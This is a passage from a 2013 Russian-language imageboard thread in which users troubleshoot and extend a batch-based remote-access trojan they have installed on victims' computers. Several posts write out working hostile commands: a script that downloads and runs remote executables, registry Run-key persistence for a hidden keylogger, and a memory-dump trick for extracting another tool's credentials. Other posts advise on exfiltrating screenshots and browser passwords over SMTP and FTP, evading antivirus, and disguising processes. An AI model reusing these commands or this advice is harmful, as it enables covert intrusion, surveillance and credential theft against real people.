>>42937
Хуй таМ, не работает прокси. Блядь, обидно, неужели ниче сделать нельзя? Я знаю, что хозяин компа подключается с работы к себе по радмину.

Аноним Срд 17 Апр 2013 16:59:48  #120 №42941 

>>42937
>Ноуп.
Т.е. xvid.bat - всё, что мне нужно для запуска и эксплуатации личинки, да?

Аноним Срд 17 Апр 2013 17:00:31  #121 №42942 

>>42937
Ты мне лучше скажи, почему у меня у 80% хомяков не работает postie. И почему на ftp приходят файлы весом 0 байт. Если посоветуешь как лечить, буду очень благодарен.

Аноним Срд 17 Апр 2013 17:01:20  #122 №42943 

>>42940
Порт пробрось так же, как хозяин, очевидно же.

Аноним Срд 17 Апр 2013 17:04:07  #123 №42944 

>>42943
Пробросил 4899, не коннектит. Пробовал с портами проброшенными - хуй.

Аноним Срд 17 Апр 2013 17:15:32  #124 №42945 

>>42944
Так может у него там фильтр строит на радмине. Ты же говоришь, что у тебя там уже есть засранчик - так чего мы тут гадаем за тебя?

Аноним Срд 17 Апр 2013 17:17:13  #125 №42946 

>>42945
Да я полный нуб в этих вопросах, вообще не ебу что можно предпринять. Ладно, буду думать.

Аноним Срд 17 Апр 2013 19:37:14  #126 №42947 

>>42941
Из оригинального контента - да, остальное - wget, postie, nircmd находится в белых списках антивирусов. Разве что всякие там vnc могут не понравиться.
>>42942
Ты имя-группу вроде менял? Может ли так быть, что теперь у тебя несколько с одинаковыми именами?

Аноним Срд 17 Апр 2013 19:48:45  #127 №42948 

>>42947
Не, такого быть не может. И не менял.

Аноним Срд 17 Апр 2013 20:26:27  #128 №42949 

>>42948
Не через радмин ли, из-под пользователя system, запускал ты личинки?

Аноним Срд 17 Апр 2013 20:44:13  #129 №42950 

>>42949
несколько. А так инсталлером.

Аноним Срд 17 Апр 2013 23:06:38  #130 №42961 

>>42947
И откуда тогда
>>42931
?

Аноним Срд 17 Апр 2013 23:08:40  #131 №42962 

>>42961
После запаковки?

Аноним Чтв 18 Апр 2013 06:07:20  #132 №42970 

>>42962
Он наверное всю пачку проверял. А там поди угадай, что именно он детектит. VNC, скорее всего.

Аноним Чтв 18 Апр 2013 16:43:29  #133 №42981 

Посоны, а кейлогер есть? И если нет, то как прикрутить?

Аноним Чтв 18 Апр 2013 22:01:03  #134 №42984 

>>42981
1. google кейлоггер без смс на высокой скорости скачать
2. google кейлоггер сделать установщик
3. Команда "run"

Аноним Чтв 18 Апр 2013 22:36:52  #135 №42987 

>>42984
Принято. Вопрос номер два. После getfile он удаляет архивы? Если нет, то как удалить?

Аноним Птн 19 Апр 2013 06:09:52  #136 №42993 

>>42987
> После getfile
После getfile там всего один архив и он будет удален. Вот после getfiles архивы остаются; удалить можно двумя способами:
1. Выполнить "getfiles", не указав ни одного файла для отправки - старые архивы будут удалены, а новые не будут созданы;
2. Выполнить "execute" c параметром "rd /s /q "%temp%\files""

Аноним Птн 19 Апр 2013 18:16:00  #137 №42996 

Спасибо, бро.

Аноним Птн 19 Апр 2013 22:16:31  #138 №42999 

>E:\Мои фотки\Палево\ЊлвЁйЁ\‚леЁ 086.jpg

Дело не в кодировке cheese, все скачивается отлично, это в названии файла и папки косяк с кодировкой. Что делать? Качать не хочет.

Аноним Суб 20 Апр 2013 00:32:25  #139 №43003 

>>42999
Хм... попробуй:

getfiles
E:\Мои фотки\Палево\*086.jpg
Аноним Суб 20 Апр 2013 15:54:26  #140 №43006 

>>43003
неа. Collect тоже не помогает. Пишет, что найдено 122 файла(правильно) размером 0 байт. И не качает.

Аноним Суб 20 Апр 2013 23:33:57  #141 №43008 

Кстати, никто не заморачивался с vpn? Взлетит?

Аноним Вск 21 Апр 2013 01:16:18  #142 №43010 

>>43008
Зачем он тебе? Только ради прокси - дикий оверкилл.

Аноним Вск 21 Апр 2013 01:51:28  #143 №43011 

>>43008
Качественные продукты тут не в моде.

Аноним Вск 21 Апр 2013 18:00:02  #144 №43016 

>>43010
Ну прямое соединение же, заебись.

>>43011
Качественные, это что например?

Аноним Вск 21 Апр 2013 22:57:14  #145 №43021 

>>43016
>это что например?
C, например. Не знаю, зачем ты спросил.

Аноним Пнд 22 Апр 2013 02:15:55  #146 №43027 

>>43016
>Качественные, это что например?
Нормальные боты с обходами, да хоть лодырь обычный из паблика возьми.

>Ну прямое соединение же, заебись.
Я про то, что ты из пушки по воробьям. Есть же сокс, реверс-сокс, ssh-туннель, stunnel и ещё куча возможностей устроить из жертвы проксю. Нахрен тебе впн целый поднимать ради прокси?

Аноним Пнд 22 Апр 2013 05:47:34  #147 №43028 

Ёба, такой вопрос, если личинка будет качать какой-нибудь файл, на который у АВ шишка дымиться, АВ в берсерке не снесёт саму личинку?

Аноним Втр 23 Апр 2013 21:13:42  #148 №43065 

Для инсталлера когда собираю sfx архив надо ставить галочку на Solid archive или нет?

Аноним Втр 23 Апр 2013 21:30:50  #149 №43066 

>>43065
У тебя солидный архив, как считаешь?

Аноним Втр 23 Апр 2013 23:17:39  #150 №43067 

>>43066
А в чем разница между солидным и не солидным?

Аноним Срд 24 Апр 2013 01:25:14  #151 №43070 
1366752314596.jpg

>>43067
Пикрелейтед - солидный, например.

Аноним Срд 24 Апр 2013 02:15:53  #152 №43072 

>>43070
а не солидный как выглядит?

Аноним Срд 24 Апр 2013 13:38:03  #153 №43075 

Ничего не работает, тестил на двух ПеКа. Что делал:
Создал фейкомыло на mail.ru и сайт на wen.ru. Прописал в xvid.bat:
set site=логин.wen.ru
set site0=логин.wen.ru
set site1=логин.wen.ru

В cheese.txt прописал:
sugarcube,x1x
smtp
smtp.mail.ru
фейкомыло@mail.ru
пароль
everypony
everypony
info,screenshot

Больше ничего не меняя, запихул батник в инсталлятор и запустил. Батник расквартировался где надо и запустился, однако ни через пять минут, ни через полчаса ни инфа, ни скриншот мне не прилетели.
Пробовал перезагружать печку, делать хуйцы, сосать бочку. Не помогает. Сайт залит полностью, пробовал заходить из браузера - работает. Все файлы в кодировке OEM 866. Что я сделал не так?

Аноним Срд 24 Апр 2013 13:42:34  #154 №43076 

>>43075
UPD: Личинка видит cheese.txt и находится в быстром режиме, однако команда не выполняется.

Аноним Срд 24 Апр 2013 14:19:06  #155 №43077 

>>43076
В папке %temp% появился файл postie.exe? Если нет, ты все файлы на сайт залил?

Аноним Срд 24 Апр 2013 14:39:33  #156 №43078 

>>43077
Файл есть. Мыло я указал правильно, но всё равно письмо не приходит.

Аноним Срд 24 Апр 2013 15:58:29  #157 №43079 

>>43078
у меня такая же хуйня, где-то 100 хомяков, но по почте отчет отсылают штук 5-10.
Попробуй через фтп.

Аноним Срд 24 Апр 2013 16:45:03  #158 №43080 

>>43079
Походу, облом у меня. Сервак упорно не желает работать через роутерожопу, а домашние не поймут, если я напрямую подключусь. Аноны, посоветуйте ФТП-хостинг с активным режимом, уже несколько перепробовал и все только в пассиве работают.

Аноним Срд 24 Апр 2013 18:38:17  #159 №43081 

Если я такую хуету в obey.txt залью


spoolsv.exe http://site/huita.exe -O "%temp%\huita.exe"
dir "%temp%"
start /d "%temp%" huita.exe
ping localhost -n 300 >nul
spoolsv.exe http://site/huita2 -O "%temp%\huita2.exe"
dir "%temp%"
start /d "%temp%" huita2.exe
tasklist

После запуска первой хуиты, будет висеть окно промпита 300 секунд перед запуском второй хуеты? Или батник Obey запускаеться скрытно?
Аноним Срд 24 Апр 2013 19:19:17  #160 №43082 
1366816757401.png

>>43080
> ФТП-хостинг с активным режимом
http://net2ftp.ru/
Этот с активным.
Если я правильно понял, у минимум двоих проблема именно с postie. Аж 9 из 10 не работают. Я не понимаю, в чем причина. Извините за заезженную фразу, но у меня все работает. Какие-то особо хитрые роутеры у ваших хомяков, что ли?
Там есть еще резервные способы - по http, посмотрите в хелпе. Помню, когда-то давно, когда я личинку еще не выкладывал тут, один товарищ сделал веб-сервис, к которому личинка обращалась, скачивала пустой файл с параметрами, и эти параметры (имя/группа/версия) отображались на веб-странице. Когда я обновил личинку на версию, которая к этому сервису обращалась, у меня выплыло где-то еще 20% личинок, т.е. которые по каким-то причинам не отвечали иначе. Хз, фигня это конечно, но хоть что-то.
Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
>>43081
> батник Obey запускаеться скрытно
Да, все будет ок, только dir там непонятно зачем. А тебе не удобнее ли будет использовать команду run два раза? Или тебе критично, чтоб именно с таким интервалом?
> ться
Убью.

Аноним Срд 24 Апр 2013 19:39:30  #161 №43083 

>>43082
>Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
Я тоже мейлру пользуюсь.

>Аж 9 из 10 не работают.
Меня это не сильно напрягает, главное что-бы они работали, я потом через них заливаю свою личину.

>А тебе не удобнее ли будет использовать команду run два раза? Или тебе критично, чтоб именно с таким интервалом?
Первый ехе чистилка старой личины, второй новенькая закриптованная личинка.

>Убью.
Убивай меня полностью. :3

Аноним Чтв 25 Апр 2013 02:51:45  #162 №43084 

>>43082
Этот ФТП что-то тоже не желает работать.
>Какие-то особо хитрые роутеры у ваших хомяков, что ли?
Оба тестовых компа подключены через самый обычный вай-фай маршрутизатор от D-link. По идее, мешаться сей девайс не должен.
>Кстати, еще предположение: может, письмо не проходит спамфильтр? Была такая фигня с отправкой info. Попробуйте мейл.ру, что ли, я им пользуюсь.
Я там и зарегистрировал почту, но письмо даже в спаме не появлялось.

Аноним Чтв 25 Апр 2013 12:07:30  #163 №43087 

>>43084
Ёпт, я хуею. Через день простоя личинка ВНЕЗАПНО выдала мне на фтп скрины и инфу с компов.

Аноним Чтв 25 Апр 2013 13:09:25  #164 №43088 

>>43087
В общем, путём проб, ошибок и суточной еботни вывел некоторые выводы. ОП, советую добавить это в хелп и в следующий ОП-пост:
1. Через вай-фай личинка не работает. Либо вообще ничего не посылает, либо посылает хуиту в 0 байт.
2. Однако через проводное соединение (даже если есть роутер) всё работает прекрасно.
3. Если хомяк вставляет флешку или DVD-диск в момент снятия списка файлов, то личинка палится (выдаёт сообщение "Вставьте диск в дисковод").
4. Если врублен брандмаузер, то личинка палится (брандмаузер начинает вякать на ftp.exe).
5. Если попробовать личинкой скачать вишмастер, то антивирус (по крайней мере, Microsoft Security) впадает в тантрум и выпиливает личинку, а так же всё, что попадёт под руку, лол.

Аноним Чтв 25 Апр 2013 18:48:59  #165 №43094 

>>43088
эмм..
1)у меня есть личинки, сидящие через вафлю. В принципе, соединение не важно. По крайней мере, если используешь для связи мыло.
2)Качал хреново закриптованый кейлоггер, антивирус взбугугрился на него, но личинка работает до сих пор. С MSE и авастом точно такая фигня.

Аноним Чтв 02 Май 2013 19:07:41  #166 №43150 

Ёба, у меня тут такое предложение.
Вместе с личинкой ставить батник в какой-нибудь другой директори, который проверяет есть ли основная личнка или её потёрли, если потёрли устанавливает с сайта новую личинку, с цтарую или новую директори.
Дело в том что у меня один хомяк на глазах выпилил личинку.
Еще у меня есть подозрение что некоторые ав выпиливают саму личинку когда пытаешься через неё что-нибудь качать, или по крайней мере палит её.
А с такой системой, хомяк остаёться подстрахован, если и выпилят основную личинку, хитробатник спрятянный в ебенях шиндовса скачает новую.
Запилишь пожалуйста?

Аноним Чтв 02 Май 2013 19:09:37  #167 №43151 

>>43150
>с цтарую
в старую

>спрятянный
спрятанный

самофикс.

Аноним Чтв 02 Май 2013 22:33:23  #168 №43158 
1367519603594.png

>>43150
Вообще-то давно такую мысль вынашиваю, watchdog приделать, но вот минусы как бы тоже есть: джва процесса вместо одного, две записи в реестре вместо одной, опять же если личинка уже скомпрометирована, что толку ее восстанавливать, снова будет удалена.
В первых версиях, еще когда компилил QBFC, кстати, была такая шуточная функция - при удалении личинки срабатывал триггер и пользователю показывалась сценка с грустной GLaDOS.
Хз, посмотрю как это можно сделать умно.
Странная штука вот: где-то с месяц назад один знакомый попросил меня об удаленной помощи, и я с его согласия на его ноут установил личинку с рассчетом, что позже через нее окажу ему помощь. Он сказал, чо ему надо, и оставил ноут включенным, но я так и не получил ответа. И вот сегодня ВНЕЗАПНО эта сучечка выходит на связь. Хз, в чем дело, то ли postie, то ли проблема в скачивании с сайтов.

Аноним Чтв 02 Май 2013 22:38:21  #169 №43159 

>>43158
Вообще-то судя по тому, что сейчас-то регулярно отвечает, проблема была в том, что личинка все это время не могла скачать wget, наверное. Так что по возможности следует его прилагать, меньше процент отказов будет.

Аноним Птн 03 Май 2013 04:58:51  #170 №43166 

>>43158
ну можно замаскировать процесс, назвать его например svchost.exe и переустанавливать личинку например в \WINDOWS\system32\ там куча всяких файлов хуй найдёшь что-нибудь.
QBFC? Что такое? Ни разу не слышал.

Аноним Птн 03 Май 2013 05:43:37  #171 №43167 

>>43166
>например в \WINDOWS\system32
Попытавшись затереть оригинальный? Отличная идея!

Аноним Птн 03 Май 2013 06:15:35  #172 №43169 

>>43167
Вы поехавший?
Я же сказал - переустановить.
Это значит что когда хомяк потрёт личинку из своей обычной директории она переустановиться в другую.
А с переиминованием в svchost.exe не обязательно сам бинарник переиминовывать в svchost.exe его как угодно назвать можно, главное что-бы в диспетчере задач отображался как svchost.exe.

Аноним Птн 03 Май 2013 09:41:25  #173 №43170 
1367559685676.jpg

Как бы тебе объяснить...
Знаешь, в начале прошлого века у пулеметов и даже снайперских винтовок были броневые щитки, ну ты видел наверное в фильмах. А затем перестали их монтировать на пулеметы. Зато стали уделять внимание маскировке, беспламенной и бездымной стрельбе, охлаждению ствола например, чтоб не светился.
А еще до этого были рыцари в латах в палец толщиной. А как огнестрельное-то оружие в моду вошло, латы поскидывали, и постепенно все переоделись в камуфляж.
Как думаешь, почему?
Потому что лучший способ защиты в современной войне - маскировка, а не броня. Оружие сейчас слишком хорошее. Если ты обнаружен - броня твоя похуй, от мины сверху щиток не спасет.
В нашем случае - если личинка уже обнаружена, что толку ее восстанавливать? Снова удалит. И еще и еще раз удалит, и найдет истоки. Сам не найдет - пригласит «Пацана, который в компах шарит». Хакир не найдет - так просто винду переустановят с форматированием. Единицы скажут «Окай» и будут терпеть, ящитаю.
И тут есть такой нюанс: иногда больше маскировки значит меньше маскировки. Сам понимаешь, снайпер в камуфляже «Леший» в центре города будет более заметен, нежели, например, в потёртом абибасе. Начнешь чересчур прятаться - антивирус проснется и заметит. Поэтому личинка пишется в appdata, а не в windir, и автозагрузка в hkcu\<...>\run, а не в winlogon, как хорошая программа, например.
Заменить процесс «cmd.exe» на «svchost.exe» в принципе можно, надо cmd.exe под этим именем куда-то скопировать и оттуда запускать. Посмотрим.

Аноним Птн 03 Май 2013 09:51:53  #174 №43171 

>>43170
ok

Аноним Птн 03 Май 2013 11:59:17  #175 №43174 

>>43170
Я бы на месте антивируса, увидев в hkcu/../run нечто, лежащее в appdata, сделал бы так: форман.жпг

Хотя, всякое говно типа vksaver так и делает, и, вроде, ничего.

Аноним Птн 03 Май 2013 17:09:32  #176 №43175 

>>43169
>главное что-бы в диспетчере задач отображался как svchost.exe
Вот только для этого надо не на BAT писать, лол.

Аноним Птн 03 Май 2013 17:09:58  #177 №43176 

>>43174
> всякое говно типа vksaver
GUUUGL XHROM
Яндекс-хуйня
Мейлру-хуйня
А антивирусы не фейспальмят, они с ними в сговоре.

Аноним Птн 03 Май 2013 17:10:59  #178 №43177 

>>43175
Не, можно cmd.exe скопировать куда-нибудь под именем svchost.exe и через него запустить этот bat.

Аноним Птн 03 Май 2013 20:11:28  #179 №43181 

>>43177
efgf

Аноним Вск 05 Май 2013 01:52:10  #180 №43193 

Кто-нибудь решил проблему с тупящим иногда postie и файлами на ftp в 0 байт? Особенно, блядь, второе. Три хомяка не хотят слать на мыло, на фтп присылают это говно. Обидно, вроде работает, а толку ноль.

Аноним Пнд 06 Май 2013 11:09:20  #181 №43213 

>>43193
Если будет время, напишу батник, который ты запустишь при помощи obey, и он попробует отправить письмо разными средствами: postie, blat, zerat, ncftp, ftps.exe и еще чем вспомню. И письма разного содержания попробуем. Короче, попытаемся методом тыка выявить проблему.

Аноним Пнд 06 Май 2013 16:15:50  #182 №43215 

>>42211
Автор, ты охуенен!
Напиши на фейкопочту, если пожелаешь. s_sosnickiy@2ch.hk

Аноним Пнд 06 Май 2013 18:05:12  #183 №43216 

Посоны, посоветуйте годный кейлогер.

Аноним Птн 10 Май 2013 19:15:50  #184 №43267 

поцы как на убунту запустить ??

Аноним Птн 10 Май 2013 19:31:11  #185 №43268 

То, что он как бешеный отправляет результаты команд - нормально? Я думал, он выполнит и будет ждать новой команды.
И да, куда твой Обей.тхт из папки "пароли от браузеров" девает найденные пароли?

Мимопроходилнуб.

Аноним Птн 10 Май 2013 22:08:02  #186 №43269 

>>43268
> как бешеный отправляет результаты команд
М-м-м... "multiple" использовал? Иначе я не знаю, как этого добиться. Он и должен ждать новой команды.
> девает найденные пароли
Присылает в письме. Когда выполняешь "obey", он присылает то, что выводится в командную строку.

Аноним Птн 10 Май 2013 22:50:28  #187 №43270 

>>43269
multiple не делал, просто sugarcube или как-то так, как в примерах. С кодом. Код даже не изменяю, он выполняет всё, что в cheese. Перевёл его в спящий режим, теперь нормально. Но знать как его остановить надо…
Посоветуйте кто-нибудь хороший кейлоггер, а? obey.txt годноту почти не палит (как я понял, не видит пароли от https, браузер maxthon вообще не обрабатывает, вроде).

Аноним Птн 10 Май 2013 22:52:44  #188 №43271 

>>43269
Но всё равно, ОП, ты офигенен. А может ещё и кейлоггер на .bat напишешь и включишь его в набор?

Аноним Птн 10 Май 2013 22:57:35  #189 №43272 

Кстати, реквест: отправка превьюшки скриншота вместе с самим скриншотом. Ибо интернет не позволяет по два мегабайта все скриншоты смотреть. Надо превью, и если там что-то интересное — тогда уже в полном размере грузить. Что думаешь, ОП?

Аноним Суб 11 Май 2013 02:59:25  #190 №43273 

>>43272
Думаю, надо включить сжатие в настройках.
settings
shrink=yes

Аноним Суб 11 Май 2013 03:58:53  #191 №43275 

>>43273
Понятно.

Аноним Суб 11 Май 2013 05:30:48  #192 №43276 

Как с ведроида управлять можно? Total Commander умеет в FTP, а чем править файлы в OEM866? То есть сохранять и открывать их. Jota Text Editor умеет какой-то IBM866, но мне кажется, это не оно.

Кстати, может кому-то поможет: когда я решил проверить Snowball на себе, оно нифига не работало. Попробовал зайти на свой сайт браузером (на wen.ru он был), а там ошибка 118. Не знаю, что это, но открылось только оперой через турбо, да и то медленно. Переставил сайт на narod.ru (или ucoz, фиг их знает), заработало. Короче, не знаю, что такое 118, но к некоторым сайтам доступ бывает блокирован, и тогда бот не может получить cheese.txt. Учтите. А ОП может подумать пока об этой ошибке. Сейчас всё работает. Кроме того, что он отправляет результаты непрерывно, хотя multiple не было.

Аноним Суб 11 Май 2013 06:03:09  #193 №43278 

>>43270
>obey.txt годноту почти не палит
Он вытаскивает только сохранённые пароли из браузеров, используя http://www.nirsoft.net/utils/web_browser_password.html. Для тех, что не сохранены - нужен либо кейлоггер, либо инжект в браузер и перехват из него.
>>43216
Не знаю, какой сейчас актуальный кейлоггер, раньше использовал Ardamax.

>>43267
Wine поставить. Вообще он не для ЖМУ/Пинус же.

>>43271
>кейлоггер на .bat напишешь
Лол.

>>43276
>на narod.ru (или ucoz)
Народ отдали укозу.

Аноним Суб 11 Май 2013 10:20:04  #194 №43280 

>>43276
wen.ru вообще чудит. По возможности лучше его не использовать.
> чем править файлы в OEM866
В общем-то, если ты не используешь кириллицу, кодировка пох (ну, кроме разве что utf-8 или какая-нибудь там экономная).
> отправляет результаты непрерывно
Не представляю, как такое может быть.

Аноним Суб 11 Май 2013 16:15:24  #195 №43284 

Стори: показывал знакомому, ему же и установили, для проверки. Почта на @mail.ru была. Не взлетел. Долго искал проблему, по процесс хакеру понял, что всё работает, это postie нифига не отправляет. Продолжал, когда вылезет процесс postie, навёл мышку, появилось сообщение на пару секунд, успел сделать скриншот. Сообщение показывало с какими параметрам вызывается postie. Переписал в cmd. Какая-то ошибка получилась, не помню какая, но погуглив я понял, что проблема в русском имени компьютера. И точно, переименовал комп из Нейм-ПК в Name-PC, и alert ушёл. Я возрадовался, но опять фейл: кроме алерта ничего не приходит. Опять посмотрел ключи postie, ввёл, вышла authentication failed, ошибка. Но ЯМАМАЙКЛЯНУСЬДАА логин и пароль были верные. Решил, что майл.ру опять косячит, зарегистрировал ещё одно мыло на @list.ru (у самого так, всё работает, и да, я тот анон, у которого непрерывная отправка без multiple), ввёл новое мыло в cheese, и Аллилуйя!

Мораль: иногда регистрация нового мыла решает проблемы. Мыло лучше на @list.ru (по статистике говорю, лол).
ОП, посмотри что там с русскими именами компьютера. Неужели русские символы кладут alert? Он дефолтно в 1251, если что. Может, надо в 866 перевести его.

Аноним Суб 11 Май 2013 16:19:32  #196 №43285 

>>43284

> Продолжал

Подождал.

Фикс, свайп издевается.

Аноним Суб 11 Май 2013 23:02:14  #197 №43290 

>>43284
> с русскими именами компьютера
Тррри тысячи черрртей... Как же это? Вроде имя компьютера там нигде не отсвечивает.
Что ж, спасибо за дебаг, буду искать.
Алсо, посмотрел сегодня логи того товарища, у которого месяц назад личинку установил - так она месяц не могла скачать wget.

Аноним Вск 12 Май 2013 08:59:08  #198 №43293 

>>43290
Рад помочь.

Кстати, нашёл кейлоггер, ещё не испытал на жертве, но в общем должно работать. .exe файл, можно запустить в скрытом режиме через ключ, весит ~150 кб. Создаёт в текущей директории папку, в ней логи. К чему я это… Надо посмотреть, как вирусы реагируют, если ничего не говорят — предлагаю включить в комплектацию.

Аноним Вск 12 Май 2013 09:04:04  #199 №43294 

А команда obey, скачав obey.txt, запускает его в скрытом режиме, или пользователь может увидеть, как она выполняется? Я в делах, связанных с командной строкой, нуб ещё. Может, там надо ключи всякие установить, типа -quiet, -silent, или @echo off в начале?

Аноним Вск 12 Май 2013 10:08:31  #200 №43295 

>>43294
В скрытом.

Аноним Вск 12 Май 2013 10:11:45  #201 №43296 

>>43295
Спасибо.

Аноним Вск 12 Май 2013 14:20:22  #202 №43297 

>>43296
Пожалуйста.

Не >>43295.

Аноним Вск 12 Май 2013 15:25:53  #203 №43298 

>>43297
Не в скрытом? Хммм.

Аноним Пнд 13 Май 2013 05:09:13  #204 №43299 

Не заходил на доску уже год, думал все умерли давно. Сап, я люблю тебя, Йоба-тян.

Strangelove-кун !G94AOnl5b2 Пнд 13 Май 2013 16:38:03  #205 №43305 

Давно я тут у вас не был. Хорошо сделал, малаца. Я тут тоже сюрпризик вам готовлю.

Аноним Пнд 13 Май 2013 17:25:13  #206 №43306 

>>43305
А ты настоящий? Или это семён с твоим трип кодом?

>>43299
Ёба тян? Пруфы в студию.

Аноним Пнд 13 Май 2013 17:44:50  #207 №43307 

А как можно прогу добавить в автозагрузку? С ключом (параметром). Помоги, ОП. Нужно скрытно кейлоггер добавить в автозапуск (в скрытном режиме).

Аноним Пнд 13 Май 2013 18:01:37  #208 №43308 

>>43307
Он запускается скрытно, сам-то кейлоггер? Тогда просто -

reg add "hkcu\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "имя_ключа" /d "путь\файл.exe" /f

>>43306
Ах, они-чан, не смущай меня.
Аноним Пнд 13 Май 2013 18:15:52  #209 №43309 

>>43308
Чтобы кейлоггер запустился скрытно, нужно из консоли его с ключом /h вызвать. В этом и проблема.

Аноним Пнд 13 Май 2013 18:24:18  #210 №43310 

Господа посоны хакиры, а чем плохо пунтосвичер в качестве кейлоггера?

Аноним Пнд 13 Май 2013 18:27:54  #211 №43311 

>>43310
Покажи как поставить его, чтобы безпалевно работал, например.

Аноним Пнд 13 Май 2013 18:36:22  #212 №43312 

>>43311
А где он палится? Иконка и прочие свистелки отключаются же.

Аноним Пнд 13 Май 2013 18:46:07  #213 №43313 

Ошибка на скрине вызвана сноуболлом?

Аноним Пнд 13 Май 2013 19:04:39  #214 №43314 

>>43313
После этого скрина юнит перестал отвечать. Может, бот вылетел…

Аноним Пнд 13 Май 2013 19:05:42  #215 №43315 

>>43314
Нет, скорее, мылору опять какую-то ерунду мутит. Как же я его ненавижу.

Strangelove-кун !G94AOnl5b2 Пнд 13 Май 2013 19:32:14  #216 №43316 

>>43306
Конечно настоящий. Сюрприз будет ровно в 00.00

Аноним Пнд 13 Май 2013 19:42:07  #217 №43317 

>>43316
Ну, раз уж настоящий, то ПШЁЛ НАХУЙ ПИДР

Аноним Пнд 13 Май 2013 20:42:25  #218 №43318 

>>43309
> с ключом /h

reg add "hkcu\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "имя_ключа" /d "путь\файл.exe /h" /f

>>43313
95%, что нет. К smtp там обращается лишь postie, а он вроде бы не имеет видимых окон, он если выводит ошибку, то в сосноль.
Аноним Пнд 13 Май 2013 20:56:39  #219 №43319 

>>43318
Спасибо, няша.
Только всё равно не понятно, отчего вдруг на каждом скрине эта ошибка… Жестоко палится бот. Да, тот юнит снова отвечает и стабильно шлёт скриншоты… с той самой ошибкой.

Аноним Пнд 13 Май 2013 21:25:45  #220 №43320 

>>43313
Это, судя по тексту, от CDO.Message. Ну, то есть, ты там не единственный хакир на этой машине, вот она и не отвечает больше.

Аноним Пнд 13 Май 2013 21:47:50  #221 №43321 

>>43319
> отвечает и стабильно шлёт скриншоты… с той самой ошибкой
Но раз ответ приходит, значит, работает? Ты вот что, запроси у него info и посмотри в списке процессов что есть, может у него какой-нибудь почтовый клиент на сервер тычется и не может проникнуть. Автозагрузку посмотри также.

Аноним Пнд 13 Май 2013 21:48:48  #222 №43322 

>>43316
Strangelove 2.0?
энивей я итальянец-кун, наверняка помнишь меня.

>>43317
Эта фраза мне почему-то знакома.

Strangelove-кун !G94AOnl5b2 Пнд 13 Май 2013 22:17:10  #223 №43323 

>>43322
Помню. Сюрприз уже скоро.

Аноним Пнд 13 Май 2013 23:07:23  #224 №43324 

>>43323
ты тред создашь или сюда запостишь?

Аноним Втр 14 Май 2013 00:23:56  #225 №43325 

Трипкод SL-куна, как он сам писал - Nahmanides.

У нас с тех пор тут каждый второй его использует.

sageАноним Втр 14 Май 2013 15:30:27  #226 №43330 

>>43322
Итальянец, а он у тебя правда пиздил хомяков с третьим радмином?

Аноним Втр 14 Май 2013 16:03:42  #227 №43332 

>>43330
Он у меня спиздил всех хомяков, на радминах которых стоял дефольтный пароль, потому-что я прописал пароль и логин для мыла привязанному к ипрату в стрэнжлов (провальная попытка автоматизировать ипрат). Случилось так что он насканил именно того хомяка на котором находился мой изменённый странжлов и увидел всё это.
Алсо через мыло он спиздил мой номер телефона лол.
Вот так-то я ступил :3

sageАноним Втр 14 Май 2013 16:40:52  #228 №43333 

>>43332
Дефолтный пароль - это какой? Ты оставлял хомяков со вторым радмином 12345678 и своим ипратом?

Аноним Втр 14 Май 2013 19:49:09  #229 №43336 

посоны, а как скачать файл, если в пути ебаная хохлядская i?

Аноним Втр 14 Май 2013 19:52:24  #230 №43337 

>>43284
Два чая этому господину. Смена почту иногда помогает.

Аноним Втр 14 Май 2013 21:52:12  #231 №43341 

>>43333
У хомяков на которых мне было похуй да, себе я забирал только няшек.

Аноним Втр 14 Май 2013 22:40:54  #232 №43348 

>>43341
Зря ты так. Почтовый пароль из сл-пакового ипрата тоже вытаскивается на раз-два. Попадался, кстати, по уму допиленый вариант, в котором на отправку и на получение разные эккаунты.

Аноним Втр 14 Май 2013 22:59:46  #233 №43351 

>>43348
Да похуй уже, сл не пользуюсь, аккаунт мыла забанили.
Теперь личинкой Ёбы пользуюсь, за что ему огромное спасибо :3
Просто интересно что в сл2 должно было быть, сл-кун вроде обещал там овер 9к вкусных плюшек.

А что сервак ипрата еще работает?

Аноним Срд 15 Май 2013 01:24:59  #234 №43357 

>>43348

он же в экзешник ипрата вшивается, а в sl.cmd не используется

Аноним Срд 15 Май 2013 01:31:19  #235 №43358 

>>43357
Экзешник потрошится подручными средствами за минуту.

Аноним Срд 15 Май 2013 01:41:07  #236 №43359 

>>43351
В той хуите, которую сренжлов сделал для извращенцев со своего ракофорума, ничего интересного нет. Дроппер, там, на vbs, хуё-моё. Ну они со своими самоделками на пауэрбейсике и от этого, правда, охуели.

Strangelove-кун !G94AOnl5b2 Срд 15 Май 2013 04:38:21  #237 №43361 

>>43323
Да пошёл ты нахуй со своим сюрпризом, пидор.

Strangelove-кун !G94AOnl5b2 Срд 15 Май 2013 14:44:12  #238 №43372 

>>43361
ЛАВИТЕ СЕМЬОНА ТРЕПФАГА!

Аноним Срд 15 Май 2013 17:13:48  #239 №43374 

>>43358

чем? там шифрование blowfish

Аноним Срд 15 Май 2013 17:36:11  #240 №43375 

>>43374
Ключ лежит в соседней секции от зашифрованого им скрипта например. Но вообще, всё гораздо проще.
%%ntsd -p pid
.dump -f c:\xynta.txt
notepad xynta.txt
search - vbcrlf%%

Аноним Срд 15 Май 2013 17:37:53  #241 №43376 

>>43375
Ну, разметка на двачах посложнее такого хака, конечно.

Аноним Чтв 16 Май 2013 03:56:03  #242 №43391 

>>43374
Да хоть AES. Ему же надо когда-то расшифровываться, не так ли?

Аноним Чтв 16 Май 2013 11:08:40  #243 №43396 

>>43306
Нет, он не тян, он пухленький няш, а тян - не обязательно девушка, просто ласковое обращение (хоть и достаточно редко так используется).

Аноним Чтв 16 Май 2013 11:16:39  #244 №43397 
1368688599432.jpg

отклеилось
>>43396

Аноним Чтв 16 Май 2013 19:02:33  #245 №43400 
1368716553856.jpg

>>43397
>19.01.2012
Ох, время-то как летит...
А вот как всё начиналось:
http://rghost.ru/46042457
Хотя честно говоря мне чуточку стыдно за то, что я тогда делал. Надеюсь, тот юноша, который «посылку с бугуртом получил» больше на меня не сердится.

Аноним Птн 17 Май 2013 01:59:24  #246 №43411 

>>43400

Посылку с бугуртом?
Можно подробнее?

Аноним Вск 19 Май 2013 02:43:18  #247 №43475 

>>43411
Ёба кажеться я уже спрашивал, но забыл что ты мне ответил.
Спрошу еще раз.
